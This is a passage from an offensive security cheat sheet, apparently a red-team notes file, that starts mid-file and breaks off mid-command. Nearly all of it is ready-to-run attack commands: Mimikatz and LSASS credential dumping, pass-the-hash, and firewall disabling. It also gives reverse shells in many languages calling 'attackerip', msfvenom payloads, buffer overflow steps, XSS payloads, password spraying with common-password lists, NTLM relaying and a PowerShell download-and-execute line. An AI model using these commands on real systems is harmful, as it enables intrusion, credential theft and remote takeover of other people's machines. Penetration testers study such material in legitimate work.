| Procdump.exe -accepteula -ma lsass.exe lsass.dmp 286 | mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords" 287 | C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32 288 | C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64 289 | ``` 290 | 291 | ## Tunneling and Port Forwarding: 292 | 293 | ### PuTTY Remote Port Forwarding: 294 | ```bash 295 | # Forward the remote port to the destination address using PuTTY 296 | plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP 297 | ``` 298 | 299 | ### Meterpreter Port Forwarding: 300 | ```bash 301 | # Meterpreter port forwarding for remote access 302 | # For detailed usage, refer to https://www.offensive-security.com/metasploit-unleashed/portfwd/ 303 | meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.194.141 304 | kali > rdesktop 127.0.0.1:3389 305 | ``` 306 | 307 | ### Enabling RDP and Firewall Manipulation: 308 | ```bash 309 | # Enable the RDP service and configure firewall settings 310 | reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 311 | netsh firewall set service remoteadmin enable 312 | netsh firewall set service remotedesktop enable 313 | 314 | # Close Windows Firewall 315 | netsh firewall set opmode disable 316 | ``` 317 | 318 | ### Meterpreter VNC/RDP: 319 | ```bash 320 | # Enabling VNC/RDP with Meterpreter 321 | # For detailed usage, refer to https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/ 322 | run getgui -u admin -p 1234 323 | run vnc -p 5043 324 | ``` 325 | 326 | ### Using Mimikatz: 327 | ```bash 328 | # Using Mimikatz to retrieve Windows plaintext user name and password 329 | git clone https://github.com/gentilkiwi/mimikatz.git 330 | privilege::debug 331 | sekurlsa::logonPasswords full 332 | ``` 333 | 334 | # Password Hash Gathering and Cracking 335 | 336 | ## Gathering Password Hash: 337 | 338 | ### Using pth-toolkit and pth-winexe: 339 | ```bash 340 | # Clone pth-toolkit and retrieve a shell using the hash 341 | git clone https://github.com/byt3bl33d3r/pth-toolkit 342 | pth-winexe -U hash //IP cmd 343 | ``` 344 | 345 | ### Using xfreerdp: 346 | ```bash 347 | # Install freerdp-x11 and connect using a hash 348 | apt-get install freerdp-x11 349 | xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP 350 | ``` 351 | 352 | ### Using Meterpreter: 353 | ```bash 354 | # Use Meterpreter to gather hashes 355 | meterpreter > run post/windows/gather/hashdump 356 | ``` 357 | 358 | ## Exploiting Hash to Gain Access: 359 | 360 | ### Using Metasploit psexec: 361 | ```bash 362 | # Set up a Meterpreter reverse shell using the hash 363 | msf > use exploit/windows/smb/psexec 364 | msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp 365 | msf exploit(psexec) > set SMBPass HASH 366 | msf exploit(psexec) > exploit 367 | meterpreter > shell 368 | ``` 369 | 370 | ## Password Cracking with Hashcat: 371 | 372 | ### Using Hashcat: 373 | ```bash 374 | # Crack passwords using Hashcat 375 | hashcat -m 400 -a 0 hash /root/rockyou.txt 376 | ``` 377 | 378 | # Using Netcat (NC) for Shell Bouncing on Windows 379 | 380 | ## Listening and Connecting with NC: 381 | 382 | ### Setting Up a Listener: 383 | ```bash 384 | # Windows: Listen on port 31337 and execute cmd.exe 385 | c:> nc -Lp 31337 -vv -e cmd.exe 386 | ``` 387 | 388 | ### Connecting to the Listener: 389 | ```bash 390 | # Connect to the Windows listener on IP and port 31337 391 | nc 192.168.0.10 31337 392 | ``` 393 | 394 | ### Executing Shell on a Remote Host: 395 | ```bash 396 | # Execute cmd.exe on a remote host via NC 397 | c:> nc example.com 80 -e cmd.exe 398 | ``` 399 | 400 | ### Setting Up a Listener on Port 80: 401 | ```bash 402 | # Listen on port 80 403 | nc -lp 80 404 | ``` 405 | 406 | ## Advanced NC Options: 407 | 408 | ### Bouncing Shell with /bin/bash: 409 | ```bash 410 | # Bounce a shell on Windows using /bin/bash 411 | nc -lp 31337 -e /bin/bash 412 | ``` 413 | 414 | ### Randomize Output and Wait: 415 | ```bash 416 | # Randomize output and wait for 1 second before exiting 417 | nc -vv -r -w 1 192.168.0.10 -z 1-1000 418 | ``` 419 | 420 | # Finding SUID/SGID and Orphaned Files 421 | 422 | ## Locate SUID root files: 423 | ```bash 424 | # Search for SUID root files 425 | find / -user root -perm -4000 -print 426 | ``` 427 | 428 | ## Locate SGID root files: 429 | ```bash 430 | # Search for SGID root files 431 | find / -group root -perm -2000 -print 432 | ``` 433 | 434 | ## Locate SUID and SGID files: 435 | ```bash 436 | # Search for both SUID and SGID files 437 | find / -perm -4000 -o -perm -2000 -print 438 | ``` 439 | 440 | ## Find files that do not belong to any user: 441 | ```bash 442 | # Search for files without an assigned user 443 | find / -nouser -print 444 | ``` 445 | 446 | ## Locate files that do not belong to any user group: 447 | ```bash 448 | # Search for files without an assigned user group 449 | find / -nogroup -print 450 | ``` 451 | 452 | ## Find symbolic links and display their targets: 453 | ```bash 454 | # Search for symbolic links and show their targets 455 | find / -type l -ls 456 | ``` 457 | 458 | ## Python Shell Escalation: 459 | ```bash 460 | # Escalate to a Python shell 461 | python -c 'import pty;pty.spawn("/bin/bash")' 462 | ``` 463 | 464 | 465 | # Python, Ruby, and PHP HTTP Servers: 466 | 467 | ## Python 2 HTTP Server: 468 | ```bash 469 | # Start a Python 2 HTTP server 470 | python2 -m SimpleHTTPServer 471 | ``` 472 | 473 | ## Python 3 HTTP Server: 474 | ```bash 475 | # Start a Python 3 HTTP server 476 | python3 -m http.server 477 | ``` 478 | 479 | ## Ruby HTTP Server (WEBrick): 480 | ```bash 481 | # Start a Ruby WEBrick HTTP server on port 8888 482 | ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start' 483 | ``` 484 | 485 | ## PHP HTTP Server: 486 | ```bash 487 | # Start a PHP HTTP server on IP 0.0.0.0 and port 8888 488 | php -S 0.0.0.0:8888 489 | ``` 490 | 491 | # Getting Process PID: 492 | 493 | ## Find PID for a Port: 494 | ```bash 495 | # Get the PID for a process using port 80 496 | fuser -nv tcp 80 497 | ``` 498 | 499 | ## Kill a Process by Port: 500 | ```bash 501 | # Kill the process using port 80 502 | fuser -k -n tcp 80 503 | ``` 504 | 505 | # Using Hydra to Crack RDP: 506 | 507 | ```bash 508 | # Use Hydra to crack RDP with a username list and password file 509 | hydra -l admin -P /root/Desktop/passwords -t 1 -vV -f -o hydra_output.txt rdp://X.X.X.X 510 | ``` 511 | 512 | # Mounting a Remote Windows Shared Folder (SMB): 513 | 514 | ```bash 515 | # Mount a remote Windows shared folder to /mnt/remote/ 516 | smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw 517 | ``` 518 | 519 | # Compiling an Exploit in Kali: 520 | 521 | ## Compile a 32-bit Executable: 522 | ```bash 523 | # Compile a 32-bit executable from hello.c 524 | gcc -m32 -o output32 hello.c 525 | ``` 526 | 527 | ## Compile a 64-bit Executable: 528 | ```bash 529 | # Compile a 64-bit executable from hello.c 530 | gcc -m64 -o output hello.c 531 | ``` 532 | 533 | 534 | # Compiling a Windows Exploit in Kali: 535 | 536 | ```bash 537 | # Download and install MinGW 538 | wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download 539 | wine mingw-get-setup.exe 540 | # Select mingw32-base during installation 541 | # Navigate to the MinGW bin directory 542 | cd /root/.wine/drive_c/windows 543 | wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip 544 | cd /root/.wine/drive_c/MinGW/bin 545 | # Compile the exploit.c to ability.exe with necessary libraries 546 | wine gcc -o ability.exe /tmp/exploit.c -lwsock32 547 | # Execute the compiled Windows exploit 548 | wine ability.exe 549 | ``` 550 | 551 | # NASM (Netwide Assembler) Commands: 552 | 553 | ```bash 554 | # Assemble an assembly source file to binary 555 | nasm -f bin -o payload.bin payload.asm 556 | 557 | # Assemble to ELF format and link, then display the disassembled code 558 | nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload 559 | ``` 560 | 561 | # SSH Penetration: 562 | 563 | ```bash 564 | # SSH tunnel with dynamic port forwarding on local port 1080 565 | ssh -D 127.0.0.1:1080 -p 22 user@IP 566 | 567 | # Add SOCKS4 proxy configuration to /etc/proxychains.conf 568 | # Append: socks4 127.0.0.1 1080 569 | 570 | # Use proxychains to route commands through the SSH tunnel 571 | proxychains commands target 572 | 573 | # SSH penetration from one network to another, chaining multiple SSH connections 574 | 575 | # First SSH tunnel with dynamic port forwarding 576 | ssh -D 127.0.0.1:1080 -p 22 user1@IP1 577 | 578 | # Add SOCKS4 proxy configuration to /etc/proxychains.conf 579 | # Append: socks4 127.0.0.1 1080 580 | 581 | # Second SSH tunnel with dynamic port forwarding through the first tunnel 582 | proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2 583 | 584 | # Add SOCKS4 proxy configuration to /etc/proxychains.conf 585 | # Append: socks4 127.0.0.1 1081 586 | 587 | # Use proxychains to route commands through the second SSH tunnel 588 | proxychains commands target 589 | ``` 590 | 591 | # Using Metasploit for Penetration 592 | 593 | Metasploit is a powerful penetration testing tool that provides a wide range of functionalities for identifying vulnerabilities and executing exploits. Here are some useful Metasploit commands and techniques: 594 | 595 | 1. **IP Configuration and Routing:** 596 | - Description: Obtain the IP address of the compromised system, configure routing, and pivot through it. 597 | ```bash 598 | meterpreter > ipconfig 599 | IP Address: 10.1.13.3 600 | meterpreter > run autoroute -s 10.1.13.0/24 601 | meterpreter > run autoroute -p 602 | 10.1.13.0 255.255.255.0 Session 1 603 | ``` 604 | 605 | 2. **Exploiting Remote Systems:** 606 | - Description: Exploit a remote Windows system using the SMB psexec exploit module. 607 | ```bash 608 | meterpreter > Ctrl+Z 609 | msf auxiliary(tcp) > use exploit/windows/smb/psexec 610 | msf exploit(psexec) > set RHOST 10.1.13.2 611 | msf exploit(psexec) > exploit 612 | meterpreter > ipconfig 613 | IP Address: 10.1.13.2 614 | ``` 615 | 616 | 3. **Exploit-DB Search:** 617 | - Description: Search for exploits in the Exploit-DB database based on keywords or criteria. 618 | ```bash 619 | git clone https://github.com/offensive-security/exploit-database.git 620 | cd exploit-database 621 | ./searchsploit -u 622 | ./searchsploit apache 2.2 623 | ./searchsploit "Linux Kernel" 624 | ``` 625 | 626 | 4. **Exploit-DB CSV Filtering:** 627 | - Description: Filter and search for specific exploits within the Exploit-DB CSV file. 628 | ```bash 629 | cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3 630 | ``` 631 | 632 | 5. **MSF Payload Generation:** 633 | - Description: Generate various Metasploit payloads for different platforms and scenarios. 634 | ```bash 635 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe > system.exe 636 | msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > exploit.php 637 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f asp > file.asp 638 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -b "\x00" -f c 639 | ``` 640 | 641 | 6. **MSF Payloads for Linux and Shellcode:** 642 | - Description: Generate payloads and shellcode for Linux and Windows. 643 | ```bash 644 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -f elf -a x86 > shell 645 | msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 -f c 646 | ``` 647 | 648 | 7. **Other Payload Types:** 649 | - Description: Generate payloads for Python, ASP, Bash, and more. 650 | ```bash 651 | msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py 652 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 > shell.asp 653 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -o shell.sh 654 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php 655 | # Add ' LPORT= -f exe -a x86 > shell.exe 657 | ``` 658 | # 659 | # Linux commonly used security commands 660 | 661 | find / -uid 0 -perm -4000 662 | 663 | find / -perm -o=w 664 | 665 | find / -name ” ” -print 666 | find / -name “..” -print 667 | find / -name “. ” -print 668 | find / -name ” ” -print 669 | 670 | find / -nouser 671 | 672 | lsof +L1 673 | 674 | lsof -i 675 | 676 | arp -a 677 | 678 | getent passwd 679 | 680 | getent group 681 | 682 | for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done 683 | 684 | cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4 685 | 686 | find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’ 687 | chattr -i file 688 | 689 | # Windows Buffer Overflow exploits 690 | 691 | msfvenom -p windows/shell_bind_tcp -a x86 –platform win -b “\x00” -f c 692 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 –platform win -e x86/shikata_ga_nai -b “\x00” -f c 693 | 694 | # COMMONLY USED BAD CHARACTERS: 695 | 696 | \x00\x0a\x0d\x20 For http request 697 | \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_) 698 | 699 | # Regular command: 700 | pattern create 701 | pattern offset (EIP Address) 702 | pattern offset (ESP Address) 703 | add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode ) 704 | 705 | !pvefindaddr pattern_create 5000 706 | !pvefindaddr suggest 707 | !pvefindaddr nosafeseh 708 | 709 | 710 | !mona config -set workingfolder C:\Mona\%p 711 | 712 | !mona config -get workingfolder 713 | !mona mod 714 | !mona bytearray -b “\x00\x0a” 715 | !mona pc 5000 716 | !mona po EIP 717 | !mona suggest 718 | 719 | # SEH – Structured exception handling 720 | 721 | Note: SEH (“Structured Exception Handling”), or structured exception handling, is a powerful processor error or exception weapon provided by the Windows operating system to the programmer. 722 | 723 | # https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH 724 | # http://baike.baidu.com/view/243131.htm 725 | !mona suggest 726 | !mona nosafeseh 727 | nseh=”\xeb\x06\x90\x90″ (next seh chain) 728 | iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN) 729 | 730 | # ROP (DEP) 731 | 732 | Note: ROP (“Return-Oriented Programming”) is a computer security exploit technology that allows an attacker to execute code, such as un-executable memory and code signatures, in a security defense situation. 733 | 734 | DEP (“Data Execution Prevention”) is a set of hardware and software technology, in memory, strictly to distinguish between code and data to prevent the data as code execution. 735 | 736 | # https://en.wikipedia.org/wiki/Return-oriented_programming 737 | # https://zh.wikipedia.org/wiki/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5%90%91%E7%BC%96%E7%A8%8B 738 | # https://en.wikipedia.org/wiki/Data_Execution_Prevention 739 | # http://baike.baidu.com/item/DEP/7694630 740 | !mona modules 741 | !mona ropfunc -m *.dll -cpb “\x00\x09\x0a” 742 | !mona rop -m *.dll -cpb “\x00\x09\x0a” (auto suggest) 743 | 744 | # ASLR – Address space format randomization 745 | # https://en.wikipedia.org/wiki/Address_space_layout_randomization 746 | !mona noaslr 747 | # EGG Hunter technology 748 | 749 | Egg hunting This technique can be categorized as a “graded shellcode”, which basically supports you to find your actual (larger) shellcode (our “egg”) with a small, specially crafted shellcode, In search of our final shellcode. In other words, a short code executes first, then goes to the real shellcode and executes it. – Making reference to see Ice Forum , more details can be found in the code I add comments link. 750 | 751 | # https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ 752 | # http://www.pediy.com/kssd/pediy12/116190/831793/45248.pdf 753 | # http://www.fuzzysecurity.com/tutorials/expDev/4.html 754 | !mona jmp -r esp 755 | !mona egg -t lxxl 756 | \xeb\xc4 (jump backward -60) 757 | buff=lxxllxxl+shell 758 | !mona egg -t ‘w00t’ 759 | 760 | # GDB Debugger commonly used commands 761 | 762 | break *_start 763 | next 764 | step 765 | n 766 | s 767 | continue 768 | c 769 | 770 | # Data 771 | checking ‘REGISTERS’ and ‘MEMORY’ 772 | 773 | # Display the register values: (Decimal,Binary,Hex) 774 | print /d –> Decimal 775 | print /t –> Binary 776 | print /x –> Hex 777 | O/P : 778 | (gdb) print /d $eax 779 | $17 = 13 780 | (gdb) print /t $eax 781 | $18 = 1101 782 | (gdb) print /x $eax 783 | $19 = 0xd 784 | (gdb) 785 | 786 | # Display the value of a specific memory address 787 | command : x/nyz (Examine) 788 | n –> Number of fields to display ==> 789 | y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal) 790 | z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit) 791 | 792 | # BASH rebound Shell 793 | 794 | bash -i >& /dev/tcp/X.X.X.X/443 0>&1 795 | 796 | exec /bin/bash 0&0 2>&0 797 | exec /bin/bash 0&0 2>&0 798 | 799 | 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 800 | 801 | 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 802 | 803 | exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done 804 | exec 5<>/dev/tcp/attackerip/4444 805 | 806 | cat <&5 | while read line; do $line 2>&5 >&5; done # or: 807 | while read line 0<&5; do $line 2>&5 >&5; done 808 | 809 | /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1 810 | /bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1 811 | 812 | # PERL rebound Shell 813 | 814 | perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ 815 | 816 | # Win platform 817 | perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ 818 | perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ 819 | 820 | # RUBY rebound Shell 821 | 822 | ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”443″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’ 823 | 824 | # Win platform 825 | ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”443″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’ 826 | ruby -rsocket -e ‘f=TCPSocket.open(“attackerip”,”443″).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’ 827 | 828 | # PYTHON rebound Shell 829 | 830 | python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“attackerip”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’ 831 | 832 | # PHP bounce Shell 833 | 834 | php -r ‘$sock=fsockopen(“attackerip”,443);exec(“/bin/sh -i <&3 >&3 2>&3”);’ 835 | 836 | # JAVA rebound Shell 837 | 838 | r = Runtime.getRuntime() 839 | p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[]) 840 | p.waitFor() 841 | 842 | # NETCAT rebound Shell 843 | 844 | nc -e /bin/sh attackerip 4444 845 | nc -e /bin/sh 192.168.37.10 443 846 | 847 | # If the -e parameter is disabled, you can try the following command 848 | # mknod backpipe p && nc attackerip 443 0backpipe 849 | /bin/sh | nc attackerip 443 850 | rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/ 851 | 852 | # If you installed the wrong version of netcat, try the following command 853 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f 854 | 855 | TELNET rebound Shell 856 | 857 | # If netcat is not available 858 | mknod backpipe p && telnet attackerip 443 0backpipe 859 | 860 | XTERM rebound Shell 861 | 862 | # Enable the X server (: 1 – listen on TCP port 6001) 863 | 864 | apt-get install xnest 865 | Xnest :1 866 | 867 | # Remember to authorize the connection from the target IP 868 | xterm -display 127.0.0.1:1 869 | # Grant access 870 | xhost +targetip 871 | 872 | # Connect back to our X server on the target machine 873 | xterm -display attackerip:1 874 | /usr/openwin/bin/xterm -display attackerip:1 875 | or 876 | $ DISPLAY=attackerip:0 xterm 877 | 878 | # XSS 879 | 880 | # https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 881 | (“< iframes > src=http://IP:PORT ”) 882 | 883 | 884 | 885 | ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’> 886 | 887 | “;!–”=&{()} 888 | 889 |

890 |

891 | ””> 892 |

893 | 894 |

895 |

896 | 897 | perl -e ‘print “

”;’ > out 898 | 899 | 900 | 901 | (“>< iframes http://google.com < iframes >) 902 | 903 | 904 | 905 | “> 906 | %253cscript%253ealert(document.cookie)%253c/script%253e 907 | “>alert(document.cookie) 908 | %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E 909 |

910 | 911 | SSH Over SCTP (using Socat) 912 | 913 | $ socat SCTP-LISTEN:80,fork TCP:localhost:22 914 | $ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80 915 | $ ssh -lusername localhost -D 8080 -p 1337 916 | 917 | # Metagoofil – Metadata collection tool 918 | 919 | Note: Metagoofil is a tool for collecting information using Google. 920 | $ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html 921 | 922 | # Use a DNS tunnel to bypass the firewall 923 | 924 | $ apt-get update 925 | $ apt-get -y install ruby-dev git make g++ 926 | $ gem install bundler 927 | $ git clone https://github.com/iagox86/dnscat2.git 928 | $ cd dnscat2/server 929 | $ bundle install 930 | $ ruby ./dnscat2.rb 931 | dnscat2> New session established: 16059 932 | dnscat2> session -i 16059 933 | 934 | 935 | 936 | 937 | 938 | 939 | # Red-Team and Infrastructure Assessments 940 | 941 | ### External recon 942 | 943 | https://github.com/dcsync/recontools 944 | 945 | ### O365 bruting 946 | 947 | `python3 office365userenum.py -u test.txt -v -o output.txt --password 'Password1` 948 | 949 | Enumeration (opsec safe): 950 | 951 | `python o365creeper.py -f test.txt` 952 | 953 | https://github.com/0xZDH/o365spray 954 | 955 | ### subdomain finder 956 | 957 | https://spyse.com/ 958 | 959 | ### Cert search 960 | https://crt.sh 961 | `%.blah.com` 962 | ### search categorized expired domain 963 | `python3 ./domainhunter.py -r 1000` 964 | 965 | ### Metadata 966 | `PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com` 967 | 968 | ## Domain User Enumeration 969 | 970 | ### MailSniper 971 | 972 | #### Usernameharvest 973 | `Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt` 974 | #### Domainnameharvest 975 | `Invoke-DomainHarvestOWA -ExchHostname mail.domain.com` 976 | #### OWA Spray 977 | `Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt` 978 | 979 | ### Grab employee names from Linkedin 980 | 981 | `theharvester -d blah.com -l 1000 -b linkedin` 982 | 983 | https://github.com/m8r0wn/CrossLinked 984 | 985 | ### Extract Linkedin details from snov.io 986 | 987 | Regex to extract emails 988 | 989 | `grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"` 990 | 991 | ### Extract from burp 992 | 993 | `cat linkedin.txt | tr , '\n' | sed 's/\”//g' | awk '/"title":{"textDirection":"FIRST_STRONG"/{getline; print}'` 994 | 995 | ### Change format to b.lah 996 | 997 | `awk '=FS tolower(substr(,1,1)$NF)' linkedin-user-list.txt | awk '{ print }'` 998 | 999 | `awk '{print $0,tolower(substr($1,1,1)$NF)}' names.txt` 1000 | 1001 | ### Check usernames against AD: 1002 | 1003 | Handy if you have generated a list from linkedin or a list of usernames. 1004 | 1005 | `nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"` 1006 | 1007 | username list is located at `/usr/local/share/nmap/nselib/data/usernames.lst` in Kali 1008 | 1009 | ### Null sessions 1010 | 1011 | Still works on infra that was upgraded from 2k, 2k3. 1012 | 1013 | `net use \\IP_ADDRESS\ipc$ "" /user:""` 1014 | 1015 | Use enum4linux, enum or Dumpsec following the null session setup. 1016 | 1017 | ### GPP 1018 | 1019 | https://bitbucket.org/grimhacker/gpppfinder/src/master/ 1020 | 1021 | `findstr /S /I cpassword \\\sysvol\\policies\*.xml` 1022 | 1023 | ## situational awareness 1024 | 1025 | https://github.com/dafthack/HostRecon 1026 | 1027 | Privesc checks: 1028 | https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation 1029 | 1030 | ## Network Attacks 1031 | 1032 | ### Responder 1033 | 1034 | Grab NetNTLM hashes off the network 1035 | 1036 | #### Without wpad: 1037 | 1038 | `responder -I eth0` 1039 | 1040 | #### With wpad: 1041 | 1042 | `responder -I eth0 --wpad -b -f -F` 1043 | 1044 | #### Filter logs from logs folder and remove machine accounts: 1045 | 1046 | `sort -m *.txt | uniq -d | awk '!/\$/'` 1047 | 1048 | #### Cracking with John: 1049 | 1050 | `john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt` 1051 | 1052 | Use hashcat on a more powerful box. This is only for easy wins. 1053 | 1054 | #### NTLM Relaying 1055 | 1056 | `ntlmrelayx.py -tf targets.txt -c ` 1057 | 1058 | ### MITM6 1059 | 1060 | `python mitm6.py -d blah.local` 1061 | 1062 | #### Capture hashes 1063 | 1064 | `impacket-smbserver hiya /tmp/ -smb2support` 1065 | 1066 | ## Bruteforce domain passwords 1067 | ### Common Passwords 1068 | 1069 | $Company1 1070 | $Season$Year 1071 | Password1 1072 | Password! 1073 | Welcome1 1074 | Welcome! 1075 | Welcome@123 1076 | P@55word 1077 | P@55w0rd 1078 | $month$year 1079 | 1080 | ### Using hydra 1081 | 1082 | `hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V` 1083 | 1084 | ### Bruteforce using net use 1085 | 1086 | `@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL` 1087 | 1088 | 1089 | ### all systems 1090 | 1091 | `net view /domain > systems.txt` 1092 | 1093 | ### Local admin search using net use 1094 | 1095 | `@FOR /F %s in (systems.txt) DO @net use \\%s\C$ /user:domain\username 1096 | Password 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use 1097 | /delete \\%s\C$ > NUL` 1098 | 1099 | ### Domain joined machine 1100 | 1101 | `Invoke-DomainPasswordSpray -Password Spring2017` 1102 | 1103 | ## Non-domain joined testing 1104 | 1105 | When you have an initial set of compromised creds run these from a Virtual Machine to place foothold on network as domain user. 1106 | 1107 | ### Shell with domain user privileges 1108 | `C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser cmd.exe` 1109 | 1110 | `runas /netonly /user:blah@blah.com "mmc %SystemRoot%\system32\dsa.msc` 1111 | 1112 | Make sure you use the FQDN of the domain and set the reg key as below. 1113 | 1114 | ### check dc: 1115 | `nltest /dsgetdc:domain.local` 1116 | 1117 | To change DC via registry to point at domain being tested: 1118 | 1119 | HKEY_LOCAL_MACHINE 1120 | SYSTEM 1121 | CurrentControlSet 1122 | Services 1123 | Netlogon 1124 | Parameters 1125 | “SiteName“ > DC1.domain.com 1126 | 1127 | ### Create session for use with dumpsec 1128 | `net use \\10.0.0.1\ipc$ /user:domain.local\username password` 1129 | 1130 | ### Quick User lists and password policy enum 1131 | 1132 | `net users /domain` 1133 | 1134 | `net group /domain "Domain Admins"` 1135 | 1136 | `net accounts /domain` 1137 | 1138 | Note that the above commands do not work with runas. Below PowerView functions will work with runas. 1139 | 1140 | ### Powerview: 1141 | 1142 | `. .\PowerView.ps1` 1143 | 1144 | `Get-UserProperty -Properties samaccountname` 1145 | 1146 | `Get-NetGroupMember` 1147 | 1148 | `Get-DomainPolicy` 1149 | 1150 | Search shares and files using Invoke-FileFinder and Invoke-ShareFinder 1151 | 1152 | ## Domain Analysis 1153 | 1154 | ### BloodHound 1155 | 1156 | Run locally on non-domain joined machine (remember to add target domain to registry): 1157 | 1158 | ``..\BloodHound.ps1`` 1159 | 1160 | ``Invoke-BloodHound`` 1161 | 1162 | ### SharpHound 1163 | 1164 | `SharpHound.exe --CollectionMethod All` 1165 | 1166 | ### Run from remote shell 1167 | 1168 | Useful when you have a remote shell. 1169 | 1170 | `powershell Set-ExecutionPolicy RemoteSigned` 1171 | 1172 | `powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"` 1173 | 1174 | ### Run from web server or over Internet: 1175 | 1176 | Use this when you cannot copy BloodHound.ps1 over to target. 1177 | 1178 | `powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); 